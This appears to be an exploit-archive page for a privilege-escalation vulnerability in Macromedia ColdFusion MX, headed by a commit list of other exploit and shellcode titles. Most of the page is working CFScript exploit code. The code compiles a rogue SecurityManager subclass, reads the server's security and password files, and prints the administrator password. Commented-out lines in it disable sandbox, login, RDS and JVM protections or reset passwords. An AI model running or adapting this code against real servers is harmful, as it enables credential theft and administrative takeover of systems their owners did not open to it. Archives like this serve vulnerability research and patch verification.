880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
108 lines
No EOL
2.5 KiB
Text
108 lines
No EOL
2.5 KiB
Text
source: https://www.securityfocus.com/bid/11316/info
|
|
|
|
Reportedly Macromedia ColdFusion MX is affected by privilege escalation vulnerability when handling templates. This issue is due to an access validation error that allows a user to perform actions with administrator privileges.
|
|
|
|
An attacker may exploit this issue to gain administrative privileges on a computer running the vulnerable application.
|
|
|
|
<cfscript>
|
|
|
|
objFileWriter = CreateObject("java","java.io.FileWriter");
|
|
|
|
objByteArray = CreateObject("java","java.io.ByteArrayOutputStream");
|
|
|
|
objJavaC = CreateObject("java","sun.tools.javac.Main");
|
|
|
|
objString = CreateObject("java","java.lang.String");
|
|
|
|
objFile = CreateObject("java","java.io.File");
|
|
|
|
if (Server.Os.Name IS "Windows") { s = "\"; } else { s = "/"; }
|
|
|
|
strJavaSource = "#Server.ColdFusion.Rootdir##s#lib#s#SecurityExploit.java";
|
|
|
|
strCfusionJar = "#Server.ColdFusion.Rootdir##s#lib#s#cfusion.jar";
|
|
|
|
strNeoSecFile = "#Server.ColdFusion.Rootdir##s#lib#s#neo-security.xml";
|
|
|
|
strPasswdFile = "#Server.ColdFusion.Rootdir##s#lib#s#password.properties";
|
|
|
|
fileWriter = objFileWriter.init("#strJavaSource#",false);
|
|
|
|
fileWriter.write("import coldfusion.security.SecurityManager;");
|
|
|
|
fileWriter.write("import java.io.File;");
|
|
|
|
fileWriter.write("public class SecurityExploit extends SecurityManager {");
|
|
|
|
fileWriter.write("public SecurityExploit(File arg0, File arg1) {");
|
|
|
|
fileWriter.write("super(arg0, arg1); }");
|
|
|
|
fileWriter.write("public boolean isAdminSecurityEnabled(){");
|
|
|
|
fileWriter.write("return false;}}");
|
|
|
|
fileWriter.flush();
|
|
|
|
fileWriter.close();
|
|
|
|
str = objString.init("-classpath,#strCfusionJar#,#strJavaSource#");
|
|
|
|
strArr = str.split(",");
|
|
|
|
byteArray = objByteArray.init();
|
|
|
|
compileObj =objJavaC.init(byteArray,str);
|
|
|
|
compileObj.compile(strArr);
|
|
|
|
obj = CreateObject("java","SecurityExploit");
|
|
|
|
file1 = objFile.init("#strNeoSecFile#");
|
|
|
|
file2 = objFile.init("#strPasswdFile#");
|
|
|
|
obj.init(file1,file2);
|
|
|
|
obj.load();
|
|
|
|
</cfscript>
|
|
|
|
<cfscript>
|
|
|
|
// Get Administrator Password
|
|
|
|
strAdminPw = obj.getAdminPassword();
|
|
|
|
// Set Administrator Password
|
|
|
|
//obj.setAdminPassword("test123");
|
|
|
|
|
|
// Turn off Sandbox Security
|
|
|
|
//obj.setSandboxSecurityEnabled(false);
|
|
|
|
|
|
// Turn off Administrator Login
|
|
|
|
//obj.setAdminSecurityEnabled(false);
|
|
|
|
|
|
// Turn off RDS Login
|
|
|
|
//obj.setRdsSecurityEnabled(false);
|
|
|
|
|
|
// Set RDS Password
|
|
|
|
//obj.setRdsPassword("test123");
|
|
|
|
|
|
// Turn off JVM Security
|
|
|
|
//obj.setJvmSecurityEnabled(false);
|
|
|
|
</cfscript>
|
|
|
|
<cfoutput>Adminstrator Password: #strAdminPw#</cfoutput> |